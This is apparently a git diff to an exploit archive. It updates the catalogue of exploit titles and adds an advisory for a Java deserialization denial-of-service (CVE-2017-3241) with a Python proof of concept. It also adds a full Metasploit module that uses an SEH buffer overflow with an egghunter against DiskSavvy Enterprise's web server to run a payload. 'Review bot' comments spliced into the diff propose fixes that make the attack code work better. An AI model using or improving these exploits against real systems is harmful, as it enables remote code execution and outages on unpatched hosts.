diff --git a/files.csv b/files.csv
index e0070106c..b84ba6815 100644
--- a/files.csv
+++ b/files.csv
@@ -1819,7 +1819,7 @@ id,file,description,date,author,platform,type,port
 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",windows,dos,0
 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0
 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service",2010-12-02,h1ch4m,windows,dos,0
-15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0
+15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - 'mp3' Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0
 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0
 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0
 15674,platforms/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos,0
@@ -5342,6 +5342,7 @@ id,file,description,date,author,platform,type,port
 41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
 41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
 41142,platforms/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos,0
+41145,platforms/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15226,6 +15227,7 @@ id,file,description,date,author,platform,type,port
 41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
 41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
+41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -20557,31 +20559,31 @@ id,file,description,date,author,platform,type,port
 7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure",2009-01-21,Pouya_Server,php,webapps,0
 7846,platforms/php/webapps/7846.php,"Joomla! Component com_pcchess - Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0
 7847,platforms/php/webapps/7847.txt,"Joomla! Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps,0
-7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0
+7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - 'autor.php' SQL Injection",2009-01-22,nuclear,php,webapps,0
 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0
 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
-7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
+7860,platforms/php/webapps/7860.php,"Mambo Component com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0
-7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
-7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
-7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
+7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' Parameter SQL Injection",2009-01-25,JIKO,php,webapps,0
+7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - Local File Inclusion",2009-01-25,fuzion,php,webapps,0
+7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - 'Password.dat' Disclosure",2009-01-25,Pouya_Server,php,webapps,0
 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0
-7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
+7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - Blind SQL Injection",2009-01-26,fuzion,php,webapps,0
 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps,0
-7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
+7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0
 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' Parameter SQL Injection",2009-01-26,FeDeReR,php,webapps,0
 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0
-7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
+7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' Parameter SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
-7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0
+7879,platforms/php/webapps/7879.pl,"SiteXS CMS 0.1.1 - Local File Inclusion",2009-01-26,darkjoker,php,webapps,0
 7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0
-7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
-7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
+7881,platforms/php/webapps/7881.txt,"Joomla! Component ElearningForce Flash Magazine Deluxe - SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
+7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
 7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0
 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0
-7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0
+7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - 'id' Parameter Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0
 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0
 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0
 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0
diff --git a/platforms/multiple/dos/41145.py b/platforms/multiple/dos/41145.py
new file mode 100755
index 000000000..47cfe5162
--- /dev/null
+++ b/platforms/multiple/dos/41145.py
@@ -0,0 +1,311 @@
+'''
+Application: Java SE
+
+Vendor: Oracle
+
+Bug: DoS
+
+Reported: 23.12.2016
+
+Vendor response: 24.12.2016
+
+Date of Public Advisory: 17.01.2017
+
+Reference: Oracle CPU Jan 2017
+
+Author: Roman Shalymov
+
+
+
+1. ADVISORY INFORMATION
+
+Title: Oracle OpenJDK - Java Serialization DoS
+
+Advisory ID: [ERPSCAN-17-006]
+
+Risk: High
+
+Advisory URL:
+https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/
+
+Date published: 17.01.2017
+
+Vendor contacted: Oracle
+
+
+2. VULNERABILITY INFORMATION
+
+
+Class: Denial of Service
+
+Remotely Exploitable: Yes
+
+Locally Exploitable: Yes
+
+CVE Name: CVE-2017-3241
+
+CVSS Base Score: 9.0
+
+
+3. VULNERABILITY DESCRIPTION
+
+
+An attacker can cause DoS of the application which uses OpenJDK Runtime
+Environment 1.8 as its core runtime engine.
+
+
+4. VULNERABLE PACKAGES
+
+
+OpenJDK Runtime Environment build 1.8.0_112-b15
+
+
+5. SOLUTIONS AND WORKAROUNDS
+
+
+Fix ObjectInputStream.skipCustomData() method, namely readObject0(false);
+call in switch statement
+
+Adress Oracle CPU January 2017
+
+ 6. AUTHOR
+
+
+Roman Shalymov (@shalymov)
+
+
+7. TECHNICAL DESCRIPTION
+
+
+An attacker can craft a malicious sequence of bytes that will cause JVM
+StackOverflowError in the standard Java deserialization process if it uses
+ObjectInputStream.readObject() method.
+
+
+7.1. Proof of Concept
+
+An attacker creates a malicious sequence of bytes, for example, using this
+python script pwn_ser.py:
+
+'''
+#!/usr/bin/env python2
+
+import sys
+
+exp = ""
+
+#serialization header
+
+exp += '\xac\xed\x00\x05'
+
+exp1 = ''
+
+exp1 += '\x72'
+
+exp1 += '\x00\x0c'+'java.io.File'
+
+exp1 += '\x41'*8
+
+exp1 += '\x00'
+
+exp1 += '\x00\x00'
+
+
+exp += exp1 * 10000
+
+sys.stdout.write(exp)
+
+'''
+and save it in exp2.ser file
+
+
+$ ./pwn_ser2.py > exp2.ser
+
+Let's simulate deserialization process. For this purpose, we create a
+simple Java program, which uses the following standard deserialization
+pattern:
+
+
+Serialize_read.java
+
+
+import java.io.FileInputStream;
+
+import java.io.ObjectInputStream;
+
+public class Serialize_read {
+
+public static void main(String args[]) throws Exception {
+
+ if(args.length < 1) {
+
+ System.out.println("usage: "+Serialize_read.class.getSimpleName()+"
+[file]");
+
+ System.exit(-1);
+
+ }
+
+ FileInputStream fin = new FileInputStream(args[0]);
+
+ ObjectInputStream oin = new ObjectInputStream(fin);
+
+ try {
+
+ Object objFromDisk = oin.readObject();
+
+ String s = (String)objFromDisk;
+
+ System.out.println(s);
+
+ System.out.println("Successfully read!");
+
+ }catch(Exception e){}
+
+ System.exit(0);
+
+}
+
+}
+
+
+Let's try to read our malicious file (we can also simulate this stuff over
+network communication):
+
+$ javac Serialize_read.java
+
+$ java Serialize_read exp2.ser
+
+It causes the following error dump:
+
+Exception in thread "main" java.lang.StackOverflowError
+
+at
+java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)
+
+at
+java.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)
+
+at
+java.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)
+
+at java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)
+
+at java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)
+
+at java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)
+
+at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)
+
+at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
+
+at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
+
+at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
+
+at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
+
+at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
+
+at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
+
+...
+
+at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
+
+at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
+
+at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
+
+at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
+
+at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
+
+at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
+
+at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
+
+at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)
+
+at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)
+
+at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)
+
+at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)
+
+
+8. REPORT TIMELINE
+
+Reported: 23.12.2016
+
+Vendor response: 24.12.2016
+
+Date of Public Advisory: 17.01.2017
+
+9. REFERENCES
+http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
+https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/
+
+
+10. ABOUT ERPScan Research
+
+ERPScan research team specializes in vulnerability research and analysis of
+critical enterprise applications. It was acknowledged multiple times by the
+largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for
+discovering more than 400 vulnerabilities in their solutions (200 of them
+just in SAP!).
+
+ERPScan researchers are proud of discovering new types of vulnerabilities
+(TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug"
+nomination at BlackHat 2013.
+
+ERPScan experts participated as speakers, presenters, and trainers at 60+
+prime international security conferences in 25+ countries across the
+continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for
+several Fortune 2000 companies.
+
+ERPScan researchers carry out the EAS-SEC project that is focused on
+enterprise application security awareness by issuing annual SAP security
+researches.
+
+ERPScan experts were interviewed in specialized info-sec resources and
+featured in major media worldwide. Among them there are Reuters, Yahoo, SC
+Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.
+
+Our team consists of highly-qualified researchers, specialized in various
+fields of cybersecurity (from web application to ICS/SCADA systems),
+gathering their experience to conduct the best SAP security research.
+
+11. ABOUT ERPScan
+
+ERPScan is the most respected and credible Business Application
+Cybersecurity provider. Founded in 2010, the company operates globally and
+enables large Oil and Gas, Financial, Retail and other organizations to
+secure their mission-critical processes. Named as an aEmerging Vendora in
+Security by CRN, listed among aTOP 100 SAP Solution providersa and
+distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in
+discovering and resolving security vulnerabilities. ERPScan consultants
+work with SAP SE in Walldorf to assist in improving the security of their
+latest solutions.
+
+ERPScanas primary mission is to close the gap between technical and
+business security, and provide solutions for CISO's to evaluate and secure
+SAP and Oracle ERP systems and business-critical applications from both
+cyberattacks and internal fraud. As a rule, our clients are large
+enterprises, Fortune 2000 companies and MSPs, whose requirements are to
+actively monitor and manage security of vast SAP and Oracle landscapes on a
+global scale.
+
+We afollow the suna and have two hubs, located in Palo Alto and Amsterdam,
+to provide threat intelligence services, continuous support and to operate
+local offices and partner network spanning 20+ countries around the globe.
+
+
+Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
+
+Phone: 650.798.5255
+
+Twitter: @erpscan
+
+Scoop-it: Business Application Security
+'''
\ No newline at end of file
diff --git a/platforms/windows/remote/41146.rb b/platforms/windows/remote/41146.rb
new file mode 100755
index 000000000..0e965bc18
--- /dev/null
+++ b/platforms/windows/remote/41146.rb
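Review bot: The shebang `#!/usr/bin/env python2` is placed after the ninety-line advisory docstring instead of on line 1, so although the file is added with mode 100755 the documented invocation `$ ./pwn_ser2.py > exp2.ser` cannot locate an interpreter through it; move the shebang above the opening `'''`. The prose also names the script `pwn_ser.py` in section 7.1 and `pwn_ser2.py` in the command that follows, and both the remediation line in section 5 and the contact block spell `Adress`. Section 11 contains mis-encoded curly quotes (`aEmerging Vendora`, `ERPScanas`, `afollow the suna`) that should be re-encoded or replaced with ASCII quotes before the file is committed. Section 5 names the code change (`readObject0(false)` in `skipCustomData()`) but a reader looking for the defender action would be helped by one sentence pointing at the Oracle CPU January 2017 reference already listed in section 9 as the fix to apply.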
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Seh
+ include Msf::Exploit::Remote::Egghunter
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
+ caused by improper bounds checking of the request path in HTTP GET
+ requests sent to the built-in web server. This module has been
+ tested successfully on Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'vportal', # Vulnerability discovery and PoC
+ 'Gabor Seljan' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['EDB', '40869']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x09\x0a\x0d\x20",
+ 'Space' => 500
+ },
+ 'Targets' =>
+ [
+ [
+ 'Automatic Targeting',
+ {
+ 'auto' => true
+ }
+ ],
+ [
+ 'DiskSavvy Enterprise v9.1.14',
+ {
+ 'Offset' => 542,
+ 'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll]
+ }
+ ],
+ [
+ 'DiskSavvy Enterprise v9.3.14',
+ {
+ 'Offset' => 2478,
+ 'Ret' => 0x101142ff # POP # POP # RET [libspp.dll]
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Dec 01 2016',
+ 'DefaultTarget' => 0))
+ end
+
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/'
+ )
+
+ if res && res.code == 200
+ version = res.body[/Disk Savvy Enterprise v[^<]*/]
+ if version
+ vprint_status("Version detected: #{version}")
+ if version =~ /9\.(1|3)\.14/
+ return Exploit::CheckCode::Appears
+ end
+ return Exploit::CheckCode::Detected
+ end
+ else
+ vprint_error('Unable to determine due to a HTTP connection timeout')
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ mytarget = target
+
+ if target['auto']
+ mytarget = nil
+
+ print_status('Automatically detecting the target...')
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/'
+ )
+
+ if res && res.code == 200
+ if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
+ mytarget = targets[1]
+ elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
+ mytarget = targets[2]
+ end
+ end
+
+ if !mytarget
+ fail_with(Failure::NoTarget, 'No matching target')
+ end
+
+ print_status("Selected target: #{mytarget.name}")
+ end
+
+ eggoptions = {
+ checksum: true,
+ eggtag: rand_text_alpha(4, payload_badchars)
+ }
+
+ hunter, egg = generate_egghunter(
+ payload.encoded,
+ payload_badchars,
+ eggoptions
+ )
+
+ sploit = make_nops(10)
+ sploit << egg
+ sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
+ sploit << generate_seh_record(mytarget.ret)
+ sploit << make_nops(8)
+ sploit << hunter
+ sploit << rand_text_alpha(4500)
+
+ print_status('Sending malicious request...')
+
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => sploit
+ )
+ end
+end
\ No newline at end of file
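Review bot: In `check`, the `else` branch of `if res && res.code == 200` is also reached when the server did answer but with a non-200 status, yet it logs `'Unable to determine due to a HTTP connection timeout'`, so an HTTP error is misreported as a timeout. Distinguish the two cases before the `return Exploit::CheckCode::Unknown`, e.g. `vprint_error(res ? "Unexpected HTTP response code #{res.code}" : 'Unable to determine due to a HTTP connection timeout')`. The same `GET /` probe and `res && res.code == 200` test are repeated in `exploit` for automatic targeting; a small private helper that fetches the banner once would keep the version regexes in one place and make the fallback to `CheckCode::Safe` for a 200 without a banner easier to reason about.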